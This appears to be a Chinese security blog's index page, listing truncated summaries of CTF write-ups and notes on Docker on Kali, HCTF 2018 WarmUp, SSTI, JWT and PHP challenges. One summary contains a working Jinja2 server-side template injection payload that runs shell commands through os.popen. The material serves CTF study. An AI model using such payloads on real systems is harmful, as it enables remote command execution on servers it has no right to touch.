_Nov1ce

摘要： 1.kali Linux 安装docker 依次运行命令： curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add – echo 'deb https://download.docker.com/linux 阅读全文

摘要： 1.[HCTF 2018]WarmUp 1 代码审计 提示查看source.php 打开该php网页 开始代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whi 阅读全文

摘要： 1.check in arg： 在实际工作中有可能会碰到需要在nginx命令行执行php脚本的时候，当然你可以去配置一个conf用外网访问。 在nginx命令行中 使用 php index.php 就可以执行这个index.php脚本了,但是怎么传递参数呢?那就要用到$argv和$aegc了。不用开 阅读全文

摘要： SSTI原理分析 参考进阶 361-362.无过滤 payload1： ?name={{ config.__class__.__init__.__globals__['os'].popen('ls ../'). read() }} shell命令​?name={{ config.__class__. 阅读全文

摘要： 前置知识： jwt(JSON Web Token)是一串json格式的字符串，由服务端用加密算法对信息签名来保证其完 整性和不可伪造。Token里可以包含所有必要信息，这样服务端就无需保存任何关于用户或会话的 信息，JWT可用于身份认证、会话状态维持、信息交换等。它的出现是为了在网络应用环境间传递 阅读全文

摘要： SimplePHP <?php highlight_file( FILE ); if ($GET["secret"] != hash("md4", $GET["secret"])) { die('乐 '); } if (!preg_match('/http/i', $_GET['file'])) { 阅读全文